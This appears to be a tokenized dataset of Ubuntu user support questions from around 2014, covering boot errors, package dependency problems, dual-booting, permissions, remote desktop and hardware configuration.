490179	error no boot device available	hello i am running ubuntu server edition 14.04 and i keep running into this problem . when i start the computer it says `` no boot device available - strike f1 to retry boot , f2 for setup utility '' i have looked everywhere for a fix , but i found nothing that works . i just tried a boot repair disc found at https : //help.ubuntu.com/community/boot-repair and it did not work either . here is another link to what it logged after http : //paste.ubuntu.com/7728122/ . boot info script e7fc706 + boot-repair extra info [ boot-info 31jan2013 ] ============================= boot info summary : =============================== = > no known boot loader is installed in the mbr of /dev/sda . ============================ drive/partition info : ============================= drive : sda ______________________________________________ _______________ partition boot start sector end sector # of sectors id system invalid mbr signature found . `` blkid '' output : ______________________________________________ __________ device uuid type label /dev/loop0 squashfs /dev/sr0 iso9660 boot-repair-disk 32bit ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) ======================== unknown mbrs/boot sectors/etc : ======================== unknown mbr on /dev/sda ========= devices which do n't seem to have a corresponding hard drive : ========= sdb sdc sdd sde =============================== stderr messages : =============================== error : hpt37x : reading /dev/sda [ input/output error ] error : hpt37x : reading /dev/sda [ input/output error ] hexdump : /dev/sda : input/output error hexdump : /dev/sda : input/output error hexdump : /dev/sda : input/output error file descriptor 8 ( /proc/2493/mounts ) leaked on lvscan invocation . parent pid 27397 : bash file descriptor 18 ( /usr/share/icons/lubuntu/places/16/folder.svg ) leaked on lvscan invocation . parent pid 27397 : bash /dev/sda : read failed after 0 of 4096 at 0 : input/output error /dev/sda : read failed after 0 of 4096 at 4096 : input/output error no volume groups found additional information : =================== log of boot-repair 2014-06-30__19h37 =================== boot-repair version : 3.198~ppa16~raring boot-sav version : 3.198~ppa16~raring glade2script version : 3.2.2~ppa45~raring boot-sav-extra version : 3.198~ppa16~raring file descriptor 8 ( /proc/2493/mounts ) leaked on lvs invocation . parent pid 5307 : /bin/sh file descriptor 18 ( /usr/share/icons/lubuntu/places/16/folder.svg ) leaked on lvs invocation . parent pid 5307 : /bin/sh /dev/sda : read failed after 0 of 4096 at 0 : input/output error /dev/sda : read failed after 0 of 4096 at 4096 : input/output error no volume groups found boot-repair is executed in live-session ( boot-repair-disk 32bit 24avr2013 , raring , ubuntu , i686 ) ls : can not access /home/usr/.config : no such file or directory cpu op-mode ( s ) : 32-bit , 64-bit file=/cdrom/preseed/lubuntu.seed boot=casper initrd=/casper/initrd.lz quiet splash -- =================== os-prober : =================== blkid : /dev/loop0 : type= '' squashfs '' /dev/sr0 : label= '' boot-repair-disk 32bit '' type= '' iso9660 '' =================== uefi/legacy mode : this live-session is not efi-compatible . secureboot maybe enabled . =================== partitions & disks : =================== parted -l : error : /dev/sda : unrecognised disk label warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label =================== parted -lm : error : /dev/sda : unrecognised disk label warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label =================== mount : /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sr0 on /cdrom type iso9660 ( ro , noatime ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) gvfsd-fuse on /run/user/lubuntu/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=lubuntu ) =================== ls : /sys/block/fd0 ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /sys/block/sda ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /sys/block/sdb ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /sys/block/sdc ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /sys/block/sdd ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /sys/block/sde ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /sys/block/sr0 ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /sys/block/sr1 ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev ( filtered ) : alarm ashmem autofs binder block bsg btrfs-control bus cdrom cdrom1 cdrw char console core cpu cpu_dma_latency disk dri dvd dvd1 dvdrw ecryptfs fb0 fd fd0 full fuse hidraw0 hidraw1 hpet input kmsg log mapper mcelog mem net network_latency network_throughput null oldmem port ppp psaux ptmx pts random rfkill rtc rtc0 sda sdb sdc sdd sde sg0 sg1 sg2 sg3 sg4 sg5 sg6 shm snapshot snd sr0 sr1 stderr stdin stdout uinput urandom vga_arbiter vhost-net zero ls /dev/mapper : control =================== df -th : filesystem type size used avail use % mounted on /cow overlayfs 1008m 20m 988m 2 % / udev devtmpfs 993m 12k 993m 1 % /dev tmpfs tmpfs 202m 760k 201m 1 % /run /dev/sr0 iso9660 496m 496m 0 100 % /cdrom /dev/loop0 squashfs 431m 431m 0 100 % /rofs none tmpfs 4.0k 0 4.0k 0 % /sys/fs/cgroup tmpfs tmpfs 1008m 8.0k 1008m 1 % /tmp none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 1008m 0 1008m 0 % /run/shm none tmpfs 100m 12k 100m 1 % /run/user =================== fdisk -l : error : no partitions =================== default settings recommended-repair this setting would reinstall the of . =================== settings chosen by the user boot-info this setting will not act on the mbr . no change has been performed on your computer . edit post quick reply adv reply reply with quote
490183	can not install anything on ubuntu 14.04 lts in software center or in teminal	when i try to install anything in the software center , i get an error message reading ; `` package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . '' attempting to install anything via the terminal , the terminal displays this message ; reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.6 but it is not going to be installed e : unable to correct problems , you have held broken packages . i have already installed some things before , and have attempting deleting them to see if it fixed anything , so i dont know why this is happening . please help ! ! ! ! ! ! ! ! ! ! ! ! thank you .
490184	how to run 'primusrun ' command with steam for wndows games on wine	i 'm new on ubuntu 14.04 , and i was trying to find out how to run primusrun command ( bumblebee ) on steam for windows games simulated with wine 1.6.2 . i have searched many forums and could not find the answer . my computer is a l502x with optimus nvidia technology . i hope someone can help me , i will wait for the answers . thanks .
490186	mounting a second hard drive for documents , pictures , and music in xubuntu	i wanted to know how to make my secondary drive for documents , music , and pictures . i already formatted the drive and mounted the drive in /media/bigdata . now i just want to know on how to make all my file go to that drive or at least have access to it , so i can put in files . thanks . ** this is what i get when i try to move a file to the new mounted hardrive . this is what i get when i try to move a file to it . error opening file '/media/bigdata/uninstalling wine.odt ' . permission denied . how do i use chown to change my permissions in my new drive , so i can copy and paste on it ? here is my original post of the process . how to add a second hard drive to an already installed xubuntu 14.04 ? * when i go to the new partition drive and i open the terminal in that location and i type ls -l this is what i get total 16 drwx -- -- -- 2 root root 16384 jul 3 10:05 lost+found
490187	why does aptitude insist on installing packages ?	why does aptitude want to install so many packages when i simply run the following ? sudo aptitude install i 'd rather not provide specific packages it wants to install because this has happened plenty of times in the past ( though i 'm not entirely sure how i 've fixed it in the past ) . any ideas ?
490189	how do i get full permission to my files ?	i have run into this problem too many times . sometimes when i 'm trying to run a command on the terminal it will say `` permission denied . '' how can i get that permission ? ?
490198	install os on micromax a92 device	how to install os on micromax a92 mobile device . what i need ? i have a92 mobile device and i want to change the os . but the tools required for it and the compatibility test for device is not known to me . had any one tried it ? or please guide me .
490199	how can i use three fingers to drag on the touchpad of a macbook pro ?	i have a macbook pro running ubuntu 14.04 , with unity on it . by default , unity has a three-finger gesture that invokes the alt-tab launcher . but i really like the os x-style three-finger drag gesture . is there any way to override the default settings and use the gesture from os x ?
490203	ubuntu 14.04 not booting after os x repair disk operation on macbook pro 9,1	after upgrade to mavericks 10.9.2 i experienced problems with the camera : basically wasn´t detected at all in os x . after google it , seems the problem would be solved by repairing the disk with os x disk utility . my mistake was basically performing this operation on the whole disk , and not on the os x partition . therefore ubuntu one got affected too . the result is the boot sequence was damaged at some point . got the famous message `` this is not a bootable disc ... '' i´ve tried every single solution to other problems that i´ve found related to this message . live boot with a usb drive and performing different operations posted here to repair efi-boot . i´ve tried with boot repair too , but nothing worked so far . i´m not an advance user so any help is highly appreciated . it´d great to avoid reinstalling ubuntu . if that is not possible , i´d like to know whether i can perform a full backup of my configuration ( documents , apps , settings , tweaks and themes ) to restore after the reinstall . thanks in advance for your help . cheers , ivan
490204	libreoffice writer opens on top of document	just got done upgrading to ubuntu 14.04 lts from 12.04 lts on two computers . one is a system 76 the other was an apple min mac that i completely converted to ubuntu , i can stand os x and or apple . problem is when i save a libreoffice writer always opens on top of document . where previously libreoffice writer open documents to the last pace i was editing them . how do i set googling libreoffice writer to open at the place where i saved it last . i tried checking libreoffice writer options and i could find anything that worked . i tried googling the problem and found nothing even close to what i i am looking to do . thant you in advance , mark .
490205	ubuntu and kali together	i 'm starting to use kali linux but i like ubuntu gui . if i add kali repositories on ubuntu sources.list or replaces ubuntu sources with kali linux sources.list , will it work like the original kali linux ? i mean to do all updates ? what advice would you give me to use all kali things on ubuntu ?
490210	the procedure for creating the virtual serial ports and communicate with them in ubuntu	i 'm new in ubuntu . i want to add virtual serial port to my computer . i used this command : sudo socat -d -d pty : pty : and i got this answer : 2014/07/01 08:47:09 socat [ 3901 ] n pty is /dev/pts/1 2014/07/01 08:47:09 socat [ 3901 ] n pty is /dev/pts/3 2014/07/01 08:47:09 socat [ 3901 ] n starting data transfer loop with fds [ 3,3 ] and [ 5,5 ] but when i use the dmesg | grep ttys* to see the serial ports i can not see the ports . and in my java application by calling this function : private void initcommportcombobox ( ) { enumeration portenum = commportidentifier.getportidentifiers ( ) ; arraylist < string > ports = new arraylist < string > ( ) ; // iterate through , looking for the port while ( portenum.hasmoreelements ( ) ) { commportidentifier currportid = ( commportidentifier ) portenum.nextelement ( ) ; ports.add ( currportid.getname ( ) ) ; } cmbports.setmodel ( new defaultcomboboxmodel ( ports.toarray ( ) ) ) ; } i can not see the ports in the combobox ! ! ! what should i do ? what is the procedure for creating the virtual serial ports and communicate with them ? ?
490211	can not install ubuntu along with windows 8 in sony vaio	i have created a live usb by following the steps provided in the ubuntu page . but when i restart by pressing shift key it asks me to choose an option . i select efi usb , but then it starts windows 8 . i have gone through this link . please help .
490212	computer does n't start ( or loses screen connection )	i followed a list of recommended steps after installation ( https : //sites.google.com/site/computertip/directdoen ) . all went well until i needed to restart after installing numlockx ( step 2.10.c ) . the computer restarted , and showed the ubuntu logo , but then the monitor goes to sleep mode , which usually means that the connection is lost . the computer is still on , according to the lights and sounds . i waited , but after almost an hour i powered the thing off ; it was the only thing i could do . i did several attempts to start it up again , but to no avail . what should i do ?
490213	webcamstudio - how to output desktop to virtual webcam ?	i 'm trying to output my desktop to a virtual webcam but i 'm having some trouble figuring out how . i looked through the manual but it did n't touch on this subject i selected desktop as my source i click the play button in the new little window , and a preview shows up on the top left i 've tried a number of combinations with the output controls on the top right ( wsvideodevice ( 0x000 ) ( 1 ) , skycam , v4l2loopback ) , but i ca n't seem to get the virtual webcam to show up as a source in cheese . am i missing something ? any help greatly appreciated
490216	i ca n't install gcc in my system ( 11.10 )	when i try , user @ user-optiplex-7010 : ~ $ sudo apt-get install gcc i got response as , reading package lists ... done building dependency tree reading state information ... done gcc is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
490222	apt-get seems to ignore specified package versions	i just added a ppa ( for compiz ) with lower version numbers , and made an apt_preferences file : package : * pin : release o=lp-ppa-townsend-compiz-nvidia-refresh-test pin-priority : 600 sure enough , the policies changed , but i have to `` downgrade '' the packages by hand ( here i already did it to compiz ) : $ apt-cache policy libcompizconfig0 compiz { , -core , -gnome , config-settings-manager , -plugins { , -default } } libcompizconfig0 : installed : 1:0.9.11.1+14.04.20140623-0ubuntu1 candidate : 1:0.9.11.1+14.04.20140623-0ubuntu1 version table : *** 1:0.9.11.1+14.04.20140623-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty-proposed/main amd64 packages 100 /var/lib/dpkg/status 1:0.9.11+14.04.20140423-0ubuntu1ppa2 0 600 http : //ppa.launchpad.net/townsend/compiz-nvidia-refresh-test/ubuntu/ trusty/main amd64 packages 1:0.9.11+14.04.20140423-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 packages 1:0.9.11+14.04.20140409-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty/main amd64 packages compiz : installed : 1:0.9.11+14.04.20140423-0ubuntu1ppa2 candidate : 1:0.9.11+14.04.20140423-0ubuntu1ppa2 version table : 1:0.9.11.1+14.04.20140623-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty-proposed/main amd64 packages *** 1:0.9.11+14.04.20140423-0ubuntu1ppa2 0 600 http : //ppa.launchpad.net/townsend/compiz-nvidia-refresh-test/ubuntu/ trusty/main amd64 packages 100 /var/lib/dpkg/status 1:0.9.11+14.04.20140423-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 packages 1:0.9.11+14.04.20140409-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty/main amd64 packages compiz-core : installed : 1:0.9.11.1+14.04.20140623-0ubuntu1 candidate : 1:0.9.11.1+14.04.20140623-0ubuntu1 version table : *** 1:0.9.11.1+14.04.20140623-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty-proposed/main amd64 packages 100 /var/lib/dpkg/status 1:0.9.11+14.04.20140423-0ubuntu1ppa2 0 600 http : //ppa.launchpad.net/townsend/compiz-nvidia-refresh-test/ubuntu/ trusty/main amd64 packages 1:0.9.11+14.04.20140423-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 packages 1:0.9.11+14.04.20140409-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty/main amd64 packages compiz-gnome : installed : 1:0.9.11.1+14.04.20140623-0ubuntu1 candidate : 1:0.9.11.1+14.04.20140623-0ubuntu1 version table : *** 1:0.9.11.1+14.04.20140623-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty-proposed/main amd64 packages 100 /var/lib/dpkg/status 1:0.9.11+14.04.20140423-0ubuntu1ppa2 0 600 http : //ppa.launchpad.net/townsend/compiz-nvidia-refresh-test/ubuntu/ trusty/main amd64 packages 1:0.9.11+14.04.20140423-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 packages 1:0.9.11+14.04.20140409-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty/main amd64 packages compizconfig-settings-manager : installed : 1:0.9.11.1+14.04.20140623-0ubuntu1 candidate : 1:0.9.11.1+14.04.20140623-0ubuntu1 version table : *** 1:0.9.11.1+14.04.20140623-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty-proposed/universe amd64 packages 100 /var/lib/dpkg/status 1:0.9.11+14.04.20140423-0ubuntu1ppa2 0 600 http : //ppa.launchpad.net/townsend/compiz-nvidia-refresh-test/ubuntu/ trusty/main amd64 packages 1:0.9.11+14.04.20140423-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty-updates/universe amd64 packages 1:0.9.11+14.04.20140409-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty/universe amd64 packages compiz-plugins : installed : 1:0.9.11.1+14.04.20140623-0ubuntu1 candidate : 1:0.9.11.1+14.04.20140623-0ubuntu1 version table : *** 1:0.9.11.1+14.04.20140623-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty-proposed/universe amd64 packages 100 /var/lib/dpkg/status 1:0.9.11+14.04.20140423-0ubuntu1ppa2 0 600 http : //ppa.launchpad.net/townsend/compiz-nvidia-refresh-test/ubuntu/ trusty/main amd64 packages 1:0.9.11+14.04.20140423-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty-updates/universe amd64 packages 1:0.9.11+14.04.20140409-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty/universe amd64 packages compiz-plugins-default : installed : 1:0.9.11.1+14.04.20140623-0ubuntu1 candidate : 1:0.9.11.1+14.04.20140623-0ubuntu1 version table : *** 1:0.9.11.1+14.04.20140623-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty-proposed/main amd64 packages 100 /var/lib/dpkg/status 1:0.9.11+14.04.20140423-0ubuntu1ppa2 0 600 http : //ppa.launchpad.net/townsend/compiz-nvidia-refresh-test/ubuntu/ trusty/main amd64 packages 1:0.9.11+14.04.20140423-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 packages 1:0.9.11+14.04.20140409-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ trusty/main amd64 packages here 's what happens when i try to substitute the versions from the ppa at once : $ sudo apt-get install { libcompizconfig0 , compiz { , -core , -gnome , config-settings-manager , -plugins { , -default } } } =1:0.9.11+14.04.20140423-0ubuntu1ppa2 reading package lists ... done building dependency tree reading state information ... done compiz is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : compiz-plugins : depends : compiz-core ( = 1:0.9.11.1+14.04.20140623-0ubuntu1 ) but 1:0.9.11+14.04.20140423-0ubuntu1ppa2 is to be installed compiz-plugins-default : depends : compiz-core ( = 1:0.9.11.1+14.04.20140623-0ubuntu1 ) but 1:0.9.11+14.04.20140423-0ubuntu1ppa2 is to be installed e : unable to correct problems , you have held broken packages . what 's this about requiring 1:0.9.11.1+14.04.20140623-0ubuntu1 ? i specified compatible versions for all packages . let 's try something more conservative : $ sudo apt-get install compiz-core=1:0.9.11+14.04.20140423-0ubuntu1ppa2 reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : compiz compiz-gnome compiz-plugins compiz-plugins-default compizconfig-settings-manager libcompizconfig0 python-compizconfig ubuntu-desktop unity unity-tweak-tool the following packages will be downgraded : compiz-core 0 upgraded , 0 newly installed , 1 downgraded , 10 to remove and 1 not upgraded . need to get 710 kb of archives . after this operation , 24.7 mb disk space will be freed . do you want to continue ? [ y/n ] n abort . ok , that wo n't work . apparently trying to `` downgrade '' any combination of the relevant packages will result in the same `` held broken packages '' error . at this point i 'm out of ideas .
490226	how to set up an ubuntu server that only streams my personal media ?	hi i am not new to ubuntu but totally new to ubuntu server and have spent the last couple of days getting more and more confused . if my question has been asked a million times please accept my apologies , i ca n't find it but a link to it would greatly appreciated . i have an old pc ( fairly good specs ) that i have decided to turn into a media server using ubuntu 12.04 lts server iso . the only requirment i need my ubuntu server to do is to perform as a cloud for all of my personal media that can only be connected internally within range of my home wifi . further , i do n't want to be able to use any web apps to connect . i just want a pc that will serve my media to my laptop phone xbox 360 etc . i would also like to do this in the most secure way possible . is this something i can achieve ? can anyone walk me through it please ?
490227	ca n't find `` documents on { username } 's ipad '' in 12.04 with an ipad mini	i found this question for 13.10 : mounting ipad in ubuntu 13.10 , ca n't find `` documents on ipad '' device i solved my `` trust-loop '' issue as the link in that question suggested , by upgrading to libimobiledevice2 1.1.6 , but that completely broke down with a lot of errors when i connected my ipad . so i downgraded back to 1.1.1-4 . now when i connect my ipad , the `` trust-loop '' bug is gone , but i can only find the `` { username } 's ipad '' folder and not the `` documents on { username } 's ipad '' folder . a post suggested rebooting my ipad which i did , with no success . please help ! i really want to put some songs and movies on my ipad soon ! edit : ok ! i reboot my laptop , and the `` documents '' folder shows up , but the `` trust-loop '' problem is back again . : (
490229	installing ubuntu in sony vaio svf15213	my laptop is sony vaio svf15213sn . it comes with preinstalled windows 8 64bit . i tried to install ubuntu 12.10 32 bit along with this windows by changing bios settings from uefi to legacy mode . instalation was success . but i cant login to windows as it says some boot error . if i switch back to uefi mode then im able to use windows but not ubuntu . is there a solution for this .
490231	install apk in ubuntu	i am using android-x86 4.4 rc2 with linux ubuntu on an intel laptop . is there any way to install .apk in ubuntu since they are from linux . if there is a chance for it , please let me know .
490234	eth1 slow to come up	hi when i disconnect the cable from eth1 and reconnect it takes around 30 seconds for the interface to come up and be pingable . we have checked the cisco port and we have portfast enabled . we did enable ubuntu to use vlans . eth1 is statically configured . any ideas what might cause this delay ? thanks for your suggestions , kam270
490237	can not run jar file on xubuntu	i 'm trying to run a jar file that i created on windows . and i would like to test if the my demo app will run as well on ubuntu . i tried by issuing java -jar rfidtest.jar in the termnal , but i have the following results . odroid @ odroid : ~/documents/rfid $ java -jar rfidtest.jar eglgetdisplay returned egl_no_displaygraphics device initialization failed for : es2 error initializing quantumrenderer : no suitable pipeline found java.lang.runtimeexception : java.lang.runtimeexception : error initializing quantumrenderer : no suitable pipeline found at com.sun.javafx.tk.quantum.quantumrenderer.getinstance ( quantumrenderer.java:300 ) at com.sun.javafx.tk.quantum.quantumtoolkit.init ( quantumtoolkit.java:243 ) at com.sun.javafx.tk.toolkit.gettoolkit ( toolkit.java:178 ) at com.sun.javafx.application.platformimpl.startup ( platformimpl.java:210 ) at com.sun.javafx.application.launcherimpl.starttoolkit ( launcherimpl.java:637 ) at com.sun.javafx.application.launcherimpl.launchapplicationwithargs ( launcherimpl.java:345 ) at com.sun.javafx.application.launcherimpl.launchapplication ( launcherimpl.java:304 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:491 ) at sun.launcher.launcherhelper $ fxhelper.main ( launcherhelper.java:754 ) caused by : java.lang.runtimeexception : error initializing quantumrenderer : no suitable pipeline found at com.sun.javafx.tk.quantum.quantumrenderer $ pipelinerunnable.init ( quantumrenderer.java:98 ) at com.sun.javafx.tk.quantum.quantumrenderer $ pipelinerunnable.run ( quantumrenderer.java:128 ) at java.lang.thread.run ( thread.java:724 ) exception in thread `` main '' java.lang.reflect.invocationtargetexception at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:491 ) at sun.launcher.launcherhelper $ fxhelper.main ( launcherhelper.java:754 ) caused by : java.lang.runtimeexception : no toolkit found at com.sun.javafx.tk.toolkit.gettoolkit ( toolkit.java:190 ) at com.sun.javafx.application.platformimpl.startup ( platformimpl.java:210 ) at com.sun.javafx.application.launcherimpl.starttoolkit ( launcherimpl.java:637 ) at com.sun.javafx.application.launcherimpl.launchapplicationwithargs ( launcherimpl.java:345 ) at com.sun.javafx.application.launcherimpl.launchapplication ( launcherimpl.java:304 ) ... 5 more i 'm new to linux/ubuntu , hope anyone can help . thanks in advance .
490240	ubuntu 14.04 desktop sharing ( vnc ) encryptiom / auth problem	i know this has been discussed , but i can not find a permanent fix . i enabled desktop sharing , unchecked `` manually approve every access '' , set a password , and i 'm trying from the local network , or via ssh port forwarding as i do n't like to permanently open ports from the router . all the vnc clients i tried say either `` unsupported auth method . '' `` unknown encryption type '' . i can see the connection is arriving to my computer with tcpdump , but the clients do n't know ubuntu 's method . a usable workaround is typing in `` gsettings set org.gnome.vino require-encryption false '' any time i 'm going to remotely access . this means no encryption , but i 'm running through a ssh tunnel , so i already have encryption . i also tried the dconf thing , but i do n't understand how to do it . ( on the net i found that i need to disable remote access with dconf and set a password there , and whatever ) . does anyone know a fix , or maybe a vnc client that knows how to deal with ubuntu 's built in remote desktop server ?
490241	need help with dual boot win 8.1 & ubuntu 14.04 on hp envy j112 tx notebook	i bought a new hp notebook with pre-installed win 8.1 . i am trying to dual boot it with ubuntu 14.04 . i have followed the usual steps , and installed ubuntu on my system . however , when i boot the system it goes to win 8 and does not dual boot . i was able to access ubuntu in the legacy mode , but had to manually intervene the boot process . to change the legacy mode i ran boot-repair , as advised on the forum here , with the recommended settings . this is the before and after bootinfo . http : //paste.ubuntu.com/7729761/ http : //paste.ubuntu.com/7729851/ now , when i try to boot into ubuntu from the hdd it goes into grub rescue mode with the error '/boot/grub/ i386-pc/normal.mod not found . which i suppose is bound to happen since grub-pc was replaced to grub-efi in the boot repair . the problem is that even after the boot repair the system boots into os manager which by default boots win 8 . i read here dual boot win 8 / ubuntu loads only win that hp notebooks might be hard-coded to boot only win 8 . since i am new to linux i 'm unable to figure out what to do next and how to work around this problem . any help would be much appreciated . thank you .
490243	how can i change the login screen resolution in 14.04	how can i change the login screen resolution in 14.04 ? these are my specs : ubuntu 14.04 amd64 nvidia 9500 gt , 340.17 driver version monitor display : 1280 x 768_60.00 vga-0
490244	ca n't set unity-greeter background on 12.04.1	i used ubuntu tweak to customize the login screen . changed the background settings , so it used desktop wallpaper as login screen background . it worked at first but then i selected a custom wallpaper from my pictures folder and suddenly there was no wallpaper just the grid on purple/red background . how can i set a custom image to the background ? i tried the solution given here , but no result .
490245	how to disable trim on ssds in ubuntu	i have enabled trim by adding discard option in /etc/fstab but even after removing it the effect is not going . how to disable it ?
490248	openjdk icedtea firefox loops `` connecting ''	ubuntu 14.04 , openjdk-7-jre_7u55 , icedtea-7-plugin_1.5 , firefox_30.0 ff > tools > add-ons > plugins > icedtea-web 1.5 = ask to activate url = http : //www.anbg.gov.au/cpbr/cd-keys/rfk/ then click `` start identification '' : opens new tab with `` about : blank '' in the address box and `` connecting ... '' i think to : http : //keys.trin.org.au:8080/key-server/player.jsp ? keyid=41 & gallery=false & thumbnails=false no `` ask '' dialog or plugin icon . loops with blank screen . this used to work in 13.10 but so much seems to have changed in all packages that old advice may not be relevant .
490250	automatically dim brightness if battery is low	in ubuntu 14.04 there is no option in the energy settings what to do when the battery is low . there is only a setting for action when critical . i would like to automatically dim the brightness on my laptop when the battery reaches a low level . is there a hidden setting for this ?
490251	go on the line where a variable define on any editor	is there any add-on or ability on geany or any known linux editor for this purpose : when you click on one variable . the mouse coursor goes to when it initialize . my code is c language . what i am looking for is some thing like this : highlight one variable and then press one key or any act and finally the editor put your mouse cursor on the line which for the first time this argument define or initialize .
490252	installing latest version of zabbix agent	i have 2 servers : staging server with ubuntu 12.04 production server with ubuntu 12.04 i tried to install zabbix agent on the above 2 servers , first i tried to install it on my production server using the following command : sudo apt-get install zabbix-agent it 's installing zabbix 2.0.4 while the staging server installs zabbix 1.8.11 . i want zabbix 2.0.4 to be installed on my staging server too . i tried sudo apt-get update and everything but its not installing 2.0.4 . how can i install the newer version ?
490255	no manual entry for unset	i try to display the help pages of unset command line , i get as a result the following output : no manual entry for unset i see this issue since they are similar , however , it can not be solution for this issue . indeed , that issue has been resolved by installing some packages using this cmd : sudo apt-get install manpages-posix manpages-posix-dev so , i try to do the same thing ; except modifying posix by unset , so i do this : sudo apt-get install manpages-unset the result was : unable to locate package manpages-unset the explicit question is : how to display manual of unset
490258	add notes on geany	i have a code to which i do not like to add my comments and notes . but i need the ability to add my notes on that . so is there any thing to do that on geany or do you need any another editor to do that ?
490265	ubuntu gnome 14.04 ca n't turn off built-in display	i have ubuntu 14.04 gnome ( 3.12 ) on my laptop . my laptop screen is broken so i just have an external monitor plugged in and i use that . in the passed version i would just turn off the built-in ( broken ) display but for some reason i ca n't do that now . it shows i have 3 displays ( which is weird sense i only have 2 , built-in and external , but i read that was a bug and it has n't bothered me really sense it 's off ) , it has built-in as secondary and external as primary . when i try to turn off the built-in it just goes back to secondary . this would n't be a big deal if my windows would stop opening in the built-in display . then i ca n't see them because that display is broken , and i ca n't move them . so i have to change the settings to mirror then the external back to primary then all the windows move to the external but i have to do that every time i open a new window . getting very annoying . anyone know a fix ? i have noticed there are a few settings that wo n't set in the gnome-control-center and i have to set them using dconf editor so i am used to that but i do n't know if there is a setting there for it or where it would be . thank you for any help !
